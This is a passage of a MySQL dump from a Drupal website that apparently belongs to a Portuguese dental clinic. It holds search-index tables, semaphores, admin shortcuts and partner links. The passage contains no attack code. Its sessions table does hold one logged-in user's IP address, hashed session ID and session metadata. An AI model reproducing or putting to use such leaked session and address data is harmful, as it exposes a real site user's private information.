-pt','node_search',1),('qua',26,'pt-pt','node_search',1),('qua',27,'pt-pt','node_search',1),('qua',28,'pt-pt','node_search',1),('qua',29,'pt-pt','node_search',1),('qua',30,'pt-pt','node_search',1),('quais',4,'pt-pt','node_search',1),('quais',13,'pt-pt','node_search',0.714225),('qualidade',2,'pt-pt','node_search',1),('qualidade',4,'pt-pt','node_search',1),('qualificados',4,'pt-pt','node_search',1),('quando',13,'pt-pt','node_search',1.7824),('que',4,'pt-pt','node_search',1),('que',5,'pt-pt','node_search',19),('que',6,'pt-pt','node_search',1),('que',13,'pt-pt','node_search',8.76176),('que',29,'pt-pt','node_search',3),('quer',5,'pt-pt','node_search',38),('quer',29,'pt-pt','node_search',2),('qui',3,'pt-pt','node_search',1),('qui',4,'pt-pt','node_search',1),('qui',5,'pt-pt','node_search',1),('qui',6,'pt-pt','node_search',1),('qui',7,'pt-pt','node_search',1),('qui',8,'pt-pt','node_search',1),('qui',20,'pt-pt','node_search',1),('qui',21,'pt-pt','node_search',1),('qui',22,'pt-pt','node_search',1),('recebam',13,'pt-pt','node_search',0.833529),('recolhida',13,'pt-pt','node_search',1),('recolhidas',13,'pt-pt','node_search',1),('recomendamos',13,'pt-pt','node_search',1),('redes',13,'pt-pt','node_search',0.72066),('refeicoes',5,'pt-pt','node_search',1),('rego',28,'pt-pt','node_search',27),('regularidade',13,'pt-pt','node_search',1),('regularmente',13,'pt-pt','node_search',0.776703),('relativas',13,'pt-pt','node_search',1),('renovados',29,'pt-pt','node_search',1),('reservase',13,'pt-pt','node_search',1),('responsabilizamos',13,'pt-pt','node_search',0.685676),('restaurante',13,'pt-pt','node_search',0.784336),('rotativos',5,'pt-pt','node_search',19),('rotina',7,'pt-pt','node_search',1),('sab',2,'pt-pt','node_search',1),('saiba',20,'pt-pt','node_search',11),('sao',2,'pt-pt','node_search',1),('sapo',13,'pt-pt','node_search',1),('sara',11,'pt-pt','node_search',27),('satisfacao',2,'pt-pt','node_search',1),('satisfacao',3,'pt-pt','node_search',4),('satisfacao',4,'pt-pt','node_search',1),('saude',3,'pt-pt','node_search',1),('security',13,'pt-pt','node_search',0.742984),('sem',13,'pt-pt','node_search',1),('sempre',3,'pt-pt','node_search',1),('sempre',13,'pt-pt','node_search',1),('sentido',3,'pt-pt','node_search',1),('sentimos',29,'pt-pt','node_search',1),('serao',13,'pt-pt','node_search',2),('service',13,'pt-pt','node_search',1),('servicos',4,'pt-pt','node_search',27),('servicos',13,'pt-pt','node_search',0.902857),('servir',20,'pt-pt','node_search',27),('seu',2,'pt-pt','node_search',1),('seu',3,'pt-pt','node_search',4),('seu',13,'pt-pt','node_search',5.41833),('seus',2,'pt-pt','node_search',1),('seus',3,'pt-pt','node_search',2),('seus',13,'pt-pt','node_search',0.76431),('sex',9,'pt-pt','node_search',1),('sex',10,'pt-pt','node_search',1),('sex',11,'pt-pt','node_search',1),('sex',12,'pt-pt','node_search',1),('sex',24,'pt-pt','node_search',1),('sex',25,'pt-pt','node_search',1),('siga',21,'pt-pt','node_search',1),('silva',11,'pt-pt','node_search',27),('silva',25,'pt-pt','node_search',27),('simples',13,'pt-pt','node_search',0.920273),('site',13,'pt-pt','node_search',24.41),('site',29,'pt-pt','node_search',29),('site',30,'pt-pt','node_search',27),('sites',13,'pt-pt','node_search',17.2034),('sobre',20,'pt-pt','node_search',11),('solucoes',22,'pt-pt','node_search',11),('solucoes',26,'pt-pt','node_search',11),('sorriso',2,'pt-pt','node_search',1),('sorriso',3,'pt-pt','node_search',4),('sorriso',22,'pt-pt','node_search',1),('sua',13,'pt-pt','node_search',2.79954),('suas',13,'pt-pt','node_search',1.93838),('sugestoes',29,'pt-pt','node_search',2),('suportar',13,'pt-pt','node_search',0.879565),('tais',13,'pt-pt','node_search',1.83817),('tal',13,'pt-pt','node_search',1),('tambem',13,'pt-pt','node_search',1.72293),('tambem',29,'pt-pt','node_search',2),('tecnicas',20,'pt-pt','node_search',1),('tecnicas',29,'pt-pt','node_search',1),('tecnologias',13,'pt-pt','node_search',0.854391),('telefone',6,'pt-pt','node_search',1),('telefone',13,'pt-pt','node_search',1),('telemovel',13,'pt-pt','node_search',1),('tem',3,'pt-pt','node_search',1),('tem',6,'pt-pt','node_search',1),('tempo',13,'pt-pt','node_search',0.972861),('ter',13,'pt-pt','node_search',0.672252),('terapeuta',12,'pt-pt','node_search',1),('terceiros',13,'pt-pt','node_search',15.1933),('teresa',10,'pt-pt','node_search',27),('termos',13,'pt-pt','node_search',27),('tipo',13,'pt-pt','node_search',0.78951),('todas',13,'pt-pt','node_search',2),('tornar',13,'pt-pt','node_search',1),('total',4,'pt-pt','node_search',1),('trabalho',29,'pt-pt','node_search',1),('tras',5,'pt-pt','node_search',38),('tratadas',13,'pt-pt','node_search',1),('tratamento',3,'pt-pt','node_search',1),('tratamento',7,'pt-pt','node_search',1),('tratamentos',2,'pt-pt','node_search',1),('tratamentos',4,'pt-pt','node_search',1),('tratamentos',20,'pt-pt','node_search',1),('troca',5,'pt-pt','node_search',1),('tua',5,'pt-pt','node_search',1),('ultimas',8,'pt-pt','node_search',1),('uma',5,'pt-pt','node_search',1),('uma',7,'pt-pt','node_search',2),('uma',13,'pt-pt','node_search',0.913226),('uma',21,'pt-pt','node_search',1),('uma',29,'pt-pt','node_search',1),('usadas',13,'pt-pt','node_search',1),('usem',13,'pt-pt','node_search',1),('uso',13,'pt-pt','node_search',1),('usufruir',6,'pt-pt','node_search',1),('uteis',13,'pt-pt','node_search',0.705825),('utilizada',13,'pt-pt','node_search',0.819249),('utilizador',13,'pt-pt','node_search',1.56869),('utilizadores',13,'pt-pt','node_search',1),('utilizamos',13,'pt-pt','node_search',2.83192),('utilizar',7,'pt-pt','node_search',1),('utilizar',13,'pt-pt','node_search',0.857458),('utilizou',13,'pt-pt','node_search',0.993146),('vai',4,'pt-pt','node_search',1),('varios',6,'pt-pt','node_search',1),('varios',13,'pt-pt','node_search',0.906287),('veja',21,'pt-pt','node_search',11),('veja',26,'pt-pt','node_search',11),('veja',30,'pt-pt','node_search',11),('ver',13,'pt-pt','node_search',0.712106),('vertical',5,'pt-pt','node_search',1),('vezes',5,'pt-pt','node_search',2),('visita',5,'pt-pt','node_search',1),('visita',13,'pt-pt','node_search',3.67811),('visitantes',13,'pt-pt','node_search',1.7017),('visitar',13,'pt-pt','node_search',0.989021),('visite',13,'pt-pt','node_search',0.695602),('visitou',13,'pt-pt','node_search',0.96498),('voce',13,'pt-pt','node_search',0.774192),('vossas',29,'pt-pt','node_search',1),('web',13,'pt-pt','node_search',18.9659),('website',13,'pt-pt','node_search',5.33136),('websites',13,'pt-pt','node_search',1.73389);

--
-- Table structure for table `search_total`
--

CREATE TABLE `search_total` (
  `word` varchar(50) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique word in the search index.',
  `count` float DEFAULT NULL COMMENT 'The count of the word in the index using Zipf''s law to equalize the probability distribution.',
  PRIMARY KEY (`word`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Stores search totals for words.';

--
-- Dumping data for table `search_total`
--

INSERT INTO `search_total` VALUES ('1',0.30103),('1024',0.30103),('1241',0.09691),('1451',0.30103),('1454',0.30103),('1455',0.30103),('1743',0.30103),('1803',0.30103),('1813',0.176091),('1819',0.30103),('1829',0.30103),('1830',0.30103),('1912',0.30103),('1998',0.30103),('1999',0.30103),('2',0.0026401),('20190511',0.30103),('20190516',0.0669468),('20190712',0.09691),('20190716',0.30103),('20190718',0.124939),('20190816',0.176091),('20191016',0.30103),('20191023',0.30103),('20200108',0.124939),('2304',0.30103),('2312',0.30103),('2318',0.30103),('26',0.30103),('3',0.00683942),('6798',0.30103),('909',0.30103),('933',0.30103),('acabas',0.0222764),('aceitacao',0.30103),('acessiveis',0.30103),('acordo',0.176091),('acordos',0.01524),('actualizar',0.30103),('adequada',0.30103),('adicao',0.30103),('admin',0.0286311),('adminclident',0.0579919),('adsense',0.30103),('afetar',0.30103),('agora',0.0222764),('agradavel',0.30103),('aguardamos',0.30103),('ajudar',0.176091),('ajudarnos',0.30103),('alargado',0.30103),('alem',0.191184),('alguma',0.30103),('alguns',0.30103),('altamente',0.176091),('alteracoes',0.195873),('alterar',0.136448),('alves',0.0157943),('amadurecimento',0.30103),('ambiente',0.30103),('ambito',0.30103),('ana',0.0152502),('ano',0.30103),('anos',0.176589),('antivirus',0.30103),('anuncios',0.0202034),('aos',0.0690209),('apenas',0.191184),('aplicada',0.30103),('apostar',0.30103),('apresentamos',0.30103),('apresentar',0.192339),('aqui',0.0347621),('area',0.30103),('armazenar',0.30103),('assinalamos',0.30103),('assinantes',0.30103),('assistente',0.124939),('atendimento',0.30103),('atraves',0.30103),('atualizado',0.30103),('aviso',0.30103),('baixo',0.30103),('barbosa',0.00796893),('beacons',0.0223986),('bem',0.30103),('bemvindo',0.30103),('boa',0.0147233),('braga',0.124939),('breve',0.30103),('browser',0.142028),('cada',0.176091),('carlos',0.0157943),('caso',0.30103),('castelo',0.00437728),('centro',0.180103),('cidade',0.30103),('cima',0.0222764),('clientes',0.176091),('clinica',0.00420764),('clinicos',0.0157943),('clix',0.30103),('coletamos',0.30103),('com',0.00510465),('como',0.0136297),('complexo',0.30103),('comunicar',0.30103),('conciliamos',0.30103),('concordancia',0.30103),('condicoes',0.01524),('confidencialidade',0.30103),('conforto',0.30103),('conheca',0.0377886),('conhecer',0.30103),('conjunto',0.30103),('conselhos',0.01524),('consiga',0.30103),('constante',0.30103),('constantemente',0.30103),('consulta',0.30103),('consulte',0.0280287),('contactenos',0.30103),('contactos',0.01524),('conter',0.30103),('conteudo',0.30103),('conteudos',0.176091),('contida',0.176091),('continuem',0.30103),('cookies',0.0204447),('crescer',0.30103),('crescimento',0.30103),('cuidados',0.30103),('culinaria',0.30103),('custos',0.185529),('dados',0.176091),('damos',0.30103),('das',0.124939),('data',0.30103),('deitar',0.30103),('demora',0.30103),('dentaria',0.00420764),('dentarios',0.00782534),('dentes',0.00440912),('dentista',0.0791812),('dentistas',0.124939),('dentro',0.0110062),('depois',0.0211893),('desde',0.30103),('desenvolvimento',0.30103),('desligar',0.30103),('deste',0.176091),('destes',0.30103),('detem',0.30103),('devem',0.30103),('devera',0.30103),('dia',0.01524),('diana',0.0157943),('direcionada',0.30103),('directos',0.30103),('direito',0.30103),('dispomos',0.30103),('disponilizado',0.30103),('dos',0.00663058),('dra',0.00532883),('dum',0.30103),('duvida',0.30103),('efetuando',0.30103),('email',0.176091),('encontro',0.30103),('endereco',0.189282),('entanto',0.197139),('enviarnos',0.30103),('equipa',0.124939),('escolhe',0.30103),('escova',0.00320514),('escovagem',0.00796893),('escovar',0.0202034),('escovarse',0.30103),('escoves',0.30103),('especiais',0.30103),('especial',0.30103),('especializados',0.30103),('esperamos',0.30103),('esperemos',0.30103),('esquecas',0.30103),('esses',0.30103),('esta',0.0078497),('estabelecido',0.30103),('estamos',0.176091),('estar',0.124939),('estarao',0.30103),('este',0.30103),('estes',0.30103),('esteticos',0.30103),('etc',0.30103),('evolucao',0.30103),('excelencia',0.30103),('exigente',0.30103),('expectativas',0.30103),('explorer',0.30103),('faca',0.30103),('face',0.30103),('fala',0.30103),('familiar',0.30103),('fara',0.30103),('ferramentas',0.226808),('ferreira',0.0157943),('ficara',0.30103),('ficarem',0.30103),('fim',0.0222764),('firefox',0.30103),('fora',0.011281),('forca',0.30103),('forma',0.0859076),('foruns',0.208898),('frente',0.00755314),('funcao',0.30103),('garantia',0.30103),('geotargeting',0.30103),('geral',0.30103),('geralmente',0.30103),('google',0.202942),('gostem',0.30103),('higiene',0.30103),('higienista',0.30103),('historia',0.30103),('historico',0.30103),('hoje',0.30103),('idade',0.30103),('imagem',0.176091),('implantes',0.0157943),('importancia',0.30103),('importante',0.30103),('incisivos',0.0222764),('inclinada',0.011281),('inclui',0.30103),('incluir',0.18206),('informacao',0.0826145),('informacoes',0.136585),('informese',0.30103),('instalacoes',0.30103),('interage',0.30103),('internet',0.103304),('isabel',0.01524),('isp',0.189282),('isso',0.225105),('isto',0.181508),('joao',0.0157943),('jose',0.0157943),('junto',0.30103),('lava',0.30103),('lavados',0.30103),('lavar',0.0222764),('lei',0.176091),('leitores',0.30103),('ler',0.30103),('lhe',0.30103),('ligacao',0.30103),('ligacoes',0.0292254),('lingua',0.30103),('lisboa',0.0144257),('logins',0.30103),('longo',0.30103),('mais',0.0280287),('manutencao',0.30103),('marco',0.30103),('maria',0.0157943),('mariana',0.0157943),('mastigam',0.0222764),('medica',0.124939),('medicina',0.0159589),('medico',0.083335),('medicos',0.176091),('melhor',0.01524),('melhorar',0.30103),('melhores',0.30103),('membros',0.30103),('menos',0.124939),('mensagem',0.30103),('meses',0.30103),('mesma',0.0213246),('mesmo',0.202091),('mesmos',0.30103),('minutos',0.30103),('moderna',0.30103),('modo',0.30103),('molares',0.0222764),('morada',0.30103),('mostrar',0.211061),('motivos',0.181785),('movimentos',0.00755314),('muita',0.30103),('nao',0.0171104),('nas',0.145427),('nasceu',0.30103),('nascimento',0.30103),('necessidade',0.30103),('necessidades',0.30103),('nesses',0.30103),('neste',0.30103),('nome',0.30103),('norton',0.30103),('nos',0.0268406),('nossa',0.0397819),('nossas',0.0184834),('nosso',0.00655699),('nossos',0.0530042),('noticias',0.01524),('novas',0.30103),('novidades',0.0377886),('novo',0.00755314),('num',0.176091),('numero',0.30103),('objectivos',0.30103),('objetivo',0.30103),('onde',0.30103),('online',0.00796893),('opcoes',0.30103),('optamos',0.30103),('oral',0.00698885),('orgulho',0.30103),('oriundos',0.30103),('ortodontia',0.0157943),('outras',0.30103),('outro',0.137778),('outros',0.110594),('outubro',0.30103),('paciente',0.30103),('pacientes',0.0791812),('padrao',0.30103),('paginas',0.30103),('para',0.00318027),('parcerias',0.0157943),('parte',0.00742847),('partes',0.011281),('partir',0.30103),('patrina',0.0157943),('pela',0.137549),('pelas',0.30103),('pelo',0.103905),('permitem',0.30103),('permitir',0.30103),('personalizado',0.176091),('pessoais',0.09691),('pessoal',0.189282),('pessoas',0.30103),('pode',0.30103),('podem',0.30103),('poder',0.30103),('podera',0.0890533),('poderao',0.30103),('politica',0.0192443),('popup',0.30103),('por',0.0166598),('posicao',0.0222764),('possivel',0.176091),('possui',0.30103),('possuimos',0.30103),('preferencias',0.30103),('presente',0.30103),('pressupoe',0.30103),('prestar',0.30103),('previo',0.30103),('prima',0.30103),('primeiro',0.0222764),('principal',0.30103),('privacidade',0.0184276),('produtiva',0.30103),('profissionais',0.30103),('programas',0.225047),('promover',0.30103),('protecao',0.30103),('protocol',0.30103),('providenciamos',0.30103),('provider',0.30103),('publicidade',0.115772),('publicitam',0.30103),('publicitarios',0.200349),('publico',0.30103),('qua',0.0791812),('quais',0.199578),('qualidade',0.176091),('qualificados',0.30103),('quando',0.0849654),('que',0.0130579),('quer',0.0107239),('qui',0.0457575),('recebam',0.30103),('recolhida',0.30103),('recolhidas',0.30103),('recomendamos',0.30103),('redes',0.30103),('refeicoes',0.30103),('rego',0.0157943),('regularidade',0.30103),('regularmente',0.30103),('relativas',0.30103),('renovados',0.30103),('reservase',0.30103),('responsabilizamos',0.30103),('restaurante',0.30103),('rotativos',0.0222764),('rotina',0.30103),('sab',0.30103),('saiba',0.0377886),('sao',0.080246),('sapo',0.30103),('sara',0.0157943),('satisfacao',0.0669468),('saude',0.013122),('security',0.30103),('sem',0.30103),('sempre',0.124939),('sentido',0.30103),('sentimos',0.30103),('serao',0.176091),('service',0.30103),('servicos',0.0152921),('servir',0.0157943),('seu',0.0398045),('seus',0.102315),('sex',0.0669468),('siga',0.30103),('silva',0.00796893),('simples',0.30103),('site',0.00536769),('sites',0.0245382),('sobre',0.0377886),('solucoes',0.0193052),('sorriso',0.0669468),('sua',0.101469),('suas',0.180669),('sugestoes',0.176091),('suportar',0.30103),('tais',0.188653),('tal',0.30103),('tambem',0.103327),('tecnicas',0.176091),('tecnologias',0.30103),('telefone',0.176091),('telemovel',0.30103),('tem',0.129075),('tempo',0.30103),('ter',0.104594),('terapeuta',0.30103),('terceiros',0.0276833),('teresa',0.0157943),('termos',0.0157943),('tipo',0.30103),('todas',0.176091),('tornar',0.30103),('total',0.30103),('trabalho',0.30103),('tras',0.011281),('tratadas',0.30103),('tratamento',0.124939),('tratamentos',0.124939),('troca',0.30103),('tua',0.30103),('ultimas',0.30103),('uma',0.0678563),('usadas',0.30103),('usem',0.30103),('uso',0.30103),('usufruir',0.30103),('uteis',0.30103),('utilizada',0.30103),('utilizador',0.214175),('utilizadores',0.30103),('utilizamos',0.131335),('utilizar',0.187061),('utilizou',0.30103),('vai',0.30103),('varios',0.18315),('veja',0.012965),('ver',0.211041),('vertical',0.30103),('vezes',0.176091),('visita',0.0841334),('visitantes',0.200754),('visitar',0.30103),('visite',0.30103),('visitou',0.30103),('voce',0.30103),('vossas',0.30103),('web',0.0223155),('website',0.0746589),('websites',0.19776);

--
-- Table structure for table `semaphore`
--

CREATE TABLE `semaphore` (
  `name` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique name.',
  `value` varchar(255) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'A value for the semaphore.',
  `expire` double NOT NULL COMMENT 'A Unix timestamp with microseconds indicating when the semaphore should expire.',
  PRIMARY KEY (`name`),
  KEY `value` (`value`),
  KEY `expire` (`expire`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Table for holding semaphores, locks, flags, etc. that…';

--
-- Dumping data for table `semaphore`
--

INSERT INTO `semaphore` VALUES ('image_style_deliver:horizontal:6gSKskOic3E-gTkZAnAtsw78LXxtAQitjnS7WLSLvQA','17795752345d3097c131f094.54664435',1563465695.2045),('image_style_deliver:horizontal:a4pjt_aQKLrWFy3j3MAdAz6hPeZnCQW1vBUtY7y0Al4','6634840695d30a9d2419ab5.27197633',1563470320.2686),('image_style_deliver:horizontal:qYAdi_W_uRmvxYqszSBZgFDqXNF7te7qoM1Q7Z56RJk','16729754955d30f062713e19.14608471',1563488384.4638),('image_style_deliver:horizontal:tos3XTyVrVpZ3XeD1SEwZhqe2lfVMrLAR_hd7Pf50pI','15880248365d3097bec88975.95613955',1563465692.8214),('image_style_deliver:horizontal:Zba71G50ZSbG-zSqFASk-oxEvl3ILIY3ZDJDey40i3s','14564085765d30977b6c2ee4.28210684',1563465625.443);

--
-- Table structure for table `sequences`
--

CREATE TABLE `sequences` (
  `value` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'The value of the sequence.',
  PRIMARY KEY (`value`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COMMENT='Stores IDs.';

--
-- Dumping data for table `sequences`
--

INSERT INTO `sequences` VALUES (8);

--
-- Table structure for table `sessions`
--

CREATE TABLE `sessions` (
  `uid` int(10) unsigned NOT NULL COMMENT 'The users.uid corresponding to a session, or 0 for anonymous user.',
  `sid` varchar(128) CHARACTER SET ascii NOT NULL COMMENT 'A session ID (hashed). The value is generated by Drupal''s session handlers.',
  `hostname` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The IP address that last used this session ID (sid).',
  `timestamp` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when this session last requested a page. Old records are purged by PHP automatically.',
  `session` longblob COMMENT 'The serialized contents of $_SESSION, an array of name/value pairs that persists across page requests by this session ID. Drupal loads $_SESSION from here at the start of each request and saves it at the end.',
  PRIMARY KEY (`sid`),
  KEY `timestamp` (`timestamp`),
  KEY `uid` (`uid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Drupal''s session handlers read and write into the sessions…';

--
-- Dumping data for table `sessions`
--

INSERT INTO `sessions` VALUES (8,'cxYj5BCuSDgKO3-HGVwbMnEJgGPh8PEBKTxO2quXlcs','2.82.38.237',1580490194,_binary '_sf2_attributes|a:1:{s:3:\"uid\";s:1:\"8\";}_sf2_meta|a:4:{s:1:\"u\";i:1580490194;s:1:\"c\";i:1578495037;s:1:\"l\";s:7:\"2000000\";s:1:\"s\";s:43:\"VlvlRwDt6MGgpwe60K9YXaf5sshYaU_iPr8A3CHJFV8\";}');

--
-- Table structure for table `shortcut`
--

CREATE TABLE `shortcut` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `shortcut_set` varchar(32) CHARACTER SET ascii NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `shortcut_field__uuid__value` (`uuid`),
  KEY `shortcut_field__shortcut_set__target_id` (`shortcut_set`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COMMENT='The base table for shortcut entities.';

--
-- Dumping data for table `shortcut`
--

INSERT INTO `shortcut` VALUES (1,'default','8dfd474b-322a-4fb1-ac48-d012896c7edc','pt-pt'),(2,'default','b4ddc858-70cc-46a6-8239-aef93beb2828','pt-pt'),(3,'default','ed8bf0d7-4267-412a-9183-c065b9b47e8b','pt-pt');

--
-- Table structure for table `shortcut_field_data`
--

CREATE TABLE `shortcut_field_data` (
  `id` int(10) unsigned NOT NULL,
  `shortcut_set` varchar(32) CHARACTER SET ascii NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii NOT NULL,
  `title` varchar(255) DEFAULT NULL,
  `weight` int(11) DEFAULT NULL,
  `link__uri` varchar(2048) DEFAULT NULL COMMENT 'The URI of the link.',
  `link__title` varchar(255) DEFAULT NULL COMMENT 'The link text.',
  `link__options` longblob COMMENT 'Serialized array of options for the link.',
  `default_langcode` tinyint(4) NOT NULL,
  PRIMARY KEY (`id`,`langcode`),
  KEY `shortcut__id__default_langcode__langcode` (`id`,`default_langcode`,`langcode`),
  KEY `shortcut_field__shortcut_set__target_id` (`shortcut_set`),
  KEY `shortcut_field__link__uri` (`link__uri`(30))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='The data table for shortcut entities.';

--
-- Dumping data for table `shortcut_field_data`
--

INSERT INTO `shortcut_field_data` VALUES (1,'default','pt-pt','Add content',-20,'internal:/node/add',NULL,_binary 'a:0:{}',1),(2,'default','pt-pt','All content',-19,'internal:/admin/content',NULL,_binary 'a:0:{}',1),(3,'default','pt-pt','Criar Página básica',NULL,'internal:/node/add/page',NULL,_binary 'a:0:{}',1);

--
-- Table structure for table `shortcut_set_users`
--

CREATE TABLE `shortcut_set_users` (
  `uid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The users.uid for this set.',
  `set_name` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The shortcut_set.set_name that will be displayed for this user.',
  PRIMARY KEY (`uid`),
  KEY `set_name` (`set_name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Maps users to shortcut sets.';

--
-- Dumping data for table `shortcut_set_users`
--


--
-- Table structure for table `taxonomy_index`
--

CREATE TABLE `taxonomy_index` (
  `nid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The node.nid this record tracks.',
  `tid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'The term ID.',
  `status` int(11) NOT NULL DEFAULT '1' COMMENT 'Boolean indicating whether the node is published (visible to non-administrators).',
  `sticky` tinyint(4) DEFAULT '0' COMMENT 'Boolean indicating whether the node is sticky.',
  `created` int(11) NOT NULL DEFAULT '0' COMMENT 'The Unix timestamp when the node was created.',
  PRIMARY KEY (`nid`,`tid`),
  KEY `term_node` (`tid`,`status`,`sticky`,`created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Maintains denormalized information about node/term…';

--
-- Dumping data for table `taxonomy_index`
--


--
-- Table structure for table `taxonomy_term__field_icon_servico`
--

CREATE TABLE `taxonomy_term__field_icon_servico` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_icon_servico_target_id` int(10) unsigned NOT NULL COMMENT 'The ID of the file entity.',
  `field_icon_servico_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
  `field_icon_servico_title` varchar(1024) DEFAULT NULL COMMENT 'Image title text, for the image''s ''title'' attribute.',
  `field_icon_servico_width` int(10) unsigned DEFAULT NULL COMMENT 'The width of the image in pixels.',
  `field_icon_servico_height` int(10) unsigned DEFAULT NULL COMMENT 'The height of the image in pixels.',
  PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `field_icon_servico_target_id` (`field_icon_servico_target_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Data storage for taxonomy_term field field_icon_servico.';

--
-- Dumping data for table `taxonomy_term__field_icon_servico`
--

INSERT INTO `taxonomy_term__field_icon_servico` VALUES ('servicos',0,1,1,'pt-pt',0,22,'','',512,512),('servicos',0,2,2,'pt-pt',0,21,'','',512,512),('servicos',0,3,3,'pt-pt',0,23,'','',512,512),('servicos',0,4,4,'pt-pt',0,24,'','',512,512),('servicos',0,5,5,'pt-pt',0,28,'','',512,512),('servicos',0,6,6,'pt-pt',0,25,'','',512,512),('servicos',0,7,7,'pt-pt',0,27,'','',512,512),('servicos',0,21,21,'pt-pt',0,109,'','',100,100);

--
-- Table structure for table `taxonomy_term__field_ligacao`
--

CREATE TABLE `taxonomy_term__field_ligacao` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_ligacao_uri` varchar(2048) DEFAULT NULL COMMENT 'The URI of the link.',
  `field_ligacao_title` varchar(255) DEFAULT NULL COMMENT 'The link text.',
  `field_ligacao_options` longblob COMMENT 'Serialized array of options for the link.',
  PRIMARY KEY (`entity_id`,`deleted`,`delta`,`langcode`),
  KEY `bundle` (`bundle`),
  KEY `revision_id` (`revision_id`),
  KEY `field_ligacao_uri` (`field_ligacao_uri`(30))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='Data storage for taxonomy_term field field_ligacao.';

--
-- Dumping data for table `taxonomy_term__field_ligacao`
--

INSERT INTO `taxonomy_term__field_ligacao` VALUES ('parcerias',0,8,8,'pt-pt',0,'https://scbraga.pt/','',_binary 'a:0:{}'),('parcerias',0,9,9,'pt-pt',0,'http://www.smpsaude.pt/','',_binary 'a:0:{}'),('parcerias',0,10,10,'pt-pt',0,'http://www.cgtp.pt/contactos/234-porto/79-sindicato-dos-trab-das-industrias-transformadoras-energia-e-actividades-do-ambiente-do-norte-site-norte','',_binary 'a:0:{}'),('parcerias',0,11,11,'pt-pt',0,'http://sindicatodostrabalhadores.pt','',_binary 'a:0:{}'),('parcerias',0,12,12,'pt-pt',0,'https://www.montepio.org/','',_binary 'a:0:{}'),('parcerias',0,13,13,'pt-pt',0,'https://www.dentycard.es/WEB/pt/Dentyred','',_binary 'a:0:{}'),('parcerias',0,14,14,'pt-pt',0,'https://www.fenprof.pt/','',_binary 'a:0:{}'),('parcerias',0,15,15,'pt-pt',0,'http://crpt-tub.pt/','',_binary 'a:0:{}'),('parcerias',0,16,16,'pt-pt',0,'https://www.sns24.gov.pt/servico/boletim-de-saude-oral/','',_binary 'a:0:{}'),('parcerias',0,18,18,'pt-pt',0,'https://www.medicare.pt/','',_binary 'a:0:{}'),('parcerias',0,19,19,'pt-pt',0,'http://www.ligacombatentes.org.pt/nucleos/mais/13','',_binary 'a:0:{}'),('parcerias',0,20,20,'pt-pt',0,'https://www.acp.pt/Inicio','',_binary 'a:0:{}');

--
-- Table structure for table `taxonomy_term__field_logotipo`
--

CREATE TABLE `taxonomy_term__field_logotipo` (
  `bundle` varchar(128) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint(4) NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int(10) unsigned NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int(10) unsigned NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int(10) unsigned NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `field_logotipo_target_id` int(10) unsigned NOT NULL COMMENT 'The ID of the file entity.',
  `field_logotipo_alt` varchar(512) DEFAULT NULL COMMENT 'Alternative image text, for the image''s ''alt'' attribute.',
